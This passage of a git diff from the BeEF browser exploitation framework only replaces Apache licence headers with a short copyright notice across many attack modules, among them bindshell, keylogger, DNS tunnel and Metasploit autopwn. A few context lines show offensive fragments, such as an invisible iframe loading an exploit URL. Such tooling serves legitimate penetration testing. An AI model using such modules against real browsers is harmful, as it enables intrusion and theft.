-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Iphone_tel < BeEF::Core::Command
 
diff --git a/modules/host/physical_location/command.js b/modules/host/physical_location/command.js
index 7d2c1947c..1a579d28a 100644
--- a/modules/host/physical_location/command.js
+++ b/modules/host/physical_location/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
     if(!beef.geolocation.isGeolocationEnabled()){
diff --git a/modules/host/physical_location/config.yaml b/modules/host/physical_location/config.yaml
index 704f77ffd..716fe62dd 100644
--- a/modules/host/physical_location/config.yaml
+++ b/modules/host/physical_location/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/host/physical_location/module.rb b/modules/host/physical_location/module.rb
index 82bd71e8c..ca9170a8d 100644
--- a/modules/host/physical_location/module.rb
+++ b/modules/host/physical_location/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Physical_location < BeEF::Core::Command
 
diff --git a/modules/ipec/cross_site_printing/command.js b/modules/ipec/cross_site_printing/command.js
index 49a0ef690..81dea2f96 100644
--- a/modules/ipec/cross_site_printing/command.js
+++ b/modules/ipec/cross_site_printing/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
 	var target_ip = "<%= @ip %>";
diff --git a/modules/ipec/cross_site_printing/config.yaml b/modules/ipec/cross_site_printing/config.yaml
index 370b690bd..fca320e93 100644
--- a/modules/ipec/cross_site_printing/config.yaml
+++ b/modules/ipec/cross_site_printing/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/ipec/cross_site_printing/module.rb b/modules/ipec/cross_site_printing/module.rb
index e74227dee..7a629f80c 100644
--- a/modules/ipec/cross_site_printing/module.rb
+++ b/modules/ipec/cross_site_printing/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Cross_site_printing < BeEF::Core::Command
   
diff --git a/modules/ipec/dns_tunnel/command.js b/modules/ipec/dns_tunnel/command.js
index 87018dba3..a41a2b4d3 100644
--- a/modules/ipec/dns_tunnel/command.js
+++ b/modules/ipec/dns_tunnel/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*
 Poor man's unidirectional DNS tunnel in JavaScript.
 The largely-untested, highly experimental first draft.
diff --git a/modules/ipec/dns_tunnel/config.yaml b/modules/ipec/dns_tunnel/config.yaml
index a38f166a7..e570728eb 100644
--- a/modules/ipec/dns_tunnel/config.yaml
+++ b/modules/ipec/dns_tunnel/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/ipec/dns_tunnel/module.rb b/modules/ipec/dns_tunnel/module.rb
index 08b07aa91..cbbeade53 100644
--- a/modules/ipec/dns_tunnel/module.rb
+++ b/modules/ipec/dns_tunnel/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Dns_tunnel < BeEF::Core::Command
   
diff --git a/modules/ipec/inter_protocol_imap/command.js b/modules/ipec/inter_protocol_imap/command.js
index 130db0727..45201d7da 100644
--- a/modules/ipec/inter_protocol_imap/command.js
+++ b/modules/ipec/inter_protocol_imap/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /**
  * Inter protocol IMAP module
  * Ported from BeEF-0.4.0.0 by jgaliana (Original author: Wade)
diff --git a/modules/ipec/inter_protocol_imap/config.yaml b/modules/ipec/inter_protocol_imap/config.yaml
index 214fa4152..4a510d116 100644
--- a/modules/ipec/inter_protocol_imap/config.yaml
+++ b/modules/ipec/inter_protocol_imap/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/ipec/inter_protocol_imap/module.rb b/modules/ipec/inter_protocol_imap/module.rb
index 7765a3437..c9c2787b4 100644
--- a/modules/ipec/inter_protocol_imap/module.rb
+++ b/modules/ipec/inter_protocol_imap/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Inter_protocol_imap < BeEF::Core::Command
 
diff --git a/modules/ipec/inter_protocol_irc/command.js b/modules/ipec/inter_protocol_irc/command.js
index 1a86b7c37..f8d522a5b 100644
--- a/modules/ipec/inter_protocol_irc/command.js
+++ b/modules/ipec/inter_protocol_irc/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /**
  * Inter protocol IRC module
  * Developed by jgaliana
diff --git a/modules/ipec/inter_protocol_irc/config.yaml b/modules/ipec/inter_protocol_irc/config.yaml
index 1341b4b7c..d7514b9c4 100644
--- a/modules/ipec/inter_protocol_irc/config.yaml
+++ b/modules/ipec/inter_protocol_irc/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/ipec/inter_protocol_irc/module.rb b/modules/ipec/inter_protocol_irc/module.rb
index 7bfef2503..c38e447ba 100644
--- a/modules/ipec/inter_protocol_irc/module.rb
+++ b/modules/ipec/inter_protocol_irc/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Inter_protocol_irc < BeEF::Core::Command
 
diff --git a/modules/ipec/inter_protocol_posix_bindshell/command.js b/modules/ipec/inter_protocol_posix_bindshell/command.js
index f8e228380..a1425f2dc 100644
--- a/modules/ipec/inter_protocol_posix_bindshell/command.js
+++ b/modules/ipec/inter_protocol_posix_bindshell/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
 	var target_ip = "<%= @ip %>";
diff --git a/modules/ipec/inter_protocol_posix_bindshell/config.yaml b/modules/ipec/inter_protocol_posix_bindshell/config.yaml
index 474d0940c..9e1596abe 100644
--- a/modules/ipec/inter_protocol_posix_bindshell/config.yaml
+++ b/modules/ipec/inter_protocol_posix_bindshell/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/ipec/inter_protocol_posix_bindshell/module.rb b/modules/ipec/inter_protocol_posix_bindshell/module.rb
index 063cb66d7..cfa507083 100644
--- a/modules/ipec/inter_protocol_posix_bindshell/module.rb
+++ b/modules/ipec/inter_protocol_posix_bindshell/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 =begin
 [+] Summary:
diff --git a/modules/ipec/inter_protocol_win_bindshell/command.js b/modules/ipec/inter_protocol_win_bindshell/command.js
index 4d4729420..430d157e4 100644
--- a/modules/ipec/inter_protocol_win_bindshell/command.js
+++ b/modules/ipec/inter_protocol_win_bindshell/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
 	var target_ip = "<%= @ip %>";
diff --git a/modules/ipec/inter_protocol_win_bindshell/config.yaml b/modules/ipec/inter_protocol_win_bindshell/config.yaml
index e49666a0a..aaa438f7b 100644
--- a/modules/ipec/inter_protocol_win_bindshell/config.yaml
+++ b/modules/ipec/inter_protocol_win_bindshell/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/ipec/inter_protocol_win_bindshell/module.rb b/modules/ipec/inter_protocol_win_bindshell/module.rb
index c8b4e2565..0f4ce6368 100644
--- a/modules/ipec/inter_protocol_win_bindshell/module.rb
+++ b/modules/ipec/inter_protocol_win_bindshell/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 =begin
 [+] Summary:
diff --git a/modules/metasploit/browser_autopwn/command.js b/modules/metasploit/browser_autopwn/command.js
index 11829cca4..a4f91072c 100644
--- a/modules/metasploit/browser_autopwn/command.js
+++ b/modules/metasploit/browser_autopwn/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 	var sploit = beef.dom.createInvisibleIframe();
         sploit.src = '<%= @sploit_url %>';
diff --git a/modules/metasploit/browser_autopwn/config.yaml b/modules/metasploit/browser_autopwn/config.yaml
index f2d6c67ce..46198ce73 100644
--- a/modules/metasploit/browser_autopwn/config.yaml
+++ b/modules/metasploit/browser_autopwn/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/metasploit/browser_autopwn/module.rb b/modules/metasploit/browser_autopwn/module.rb
index 1cebf51ac..bb18a89c4 100644
--- a/modules/metasploit/browser_autopwn/module.rb
+++ b/modules/metasploit/browser_autopwn/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Browser_autopwn < BeEF::Core::Command
 
diff --git a/modules/misc/google_search/command.js b/modules/misc/google_search/command.js
index 93366a3d5..52b15152f 100644
--- a/modules/misc/google_search/command.js
+++ b/modules/misc/google_search/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
 	var query = '<%= @query.gsub(/'/, "\\'") %>';
diff --git a/modules/misc/google_search/config.yaml b/modules/misc/google_search/config.yaml
index bc0cc6b8f..fc9868ecb 100644
--- a/modules/misc/google_search/config.yaml
+++ b/modules/misc/google_search/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/misc/google_search/module.rb b/modules/misc/google_search/module.rb
index afec66958..b93b59719 100644
--- a/modules/misc/google_search/module.rb
+++ b/modules/misc/google_search/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Google_search < BeEF::Core::Command
 
diff --git a/modules/misc/iframe_keylogger/command.js b/modules/misc/iframe_keylogger/command.js
index 7f1ed6fd1..cafc8cadd 100644
--- a/modules/misc/iframe_keylogger/command.js
+++ b/modules/misc/iframe_keylogger/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
     // logged keystrokes array
diff --git a/modules/misc/iframe_keylogger/config.yaml b/modules/misc/iframe_keylogger/config.yaml
index f65092754..c56cb0fef 100644
--- a/modules/misc/iframe_keylogger/config.yaml
+++ b/modules/misc/iframe_keylogger/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/misc/iframe_keylogger/module.rb b/modules/misc/iframe_keylogger/module.rb
index 6156f8ecd..a57d69285 100644
--- a/modules/misc/iframe_keylogger/module.rb
+++ b/modules/misc/iframe_keylogger/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
